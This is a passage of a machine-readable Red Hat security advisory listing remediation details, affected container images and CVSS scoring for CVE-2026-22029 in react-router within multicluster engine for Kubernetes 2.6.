"https://nvd.nist.gov/vuln/detail/CVE-2026-22029"}, {"category": "external", "summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx", "url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"}], "release_date": "2026-01-10T02:42:32.736000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for 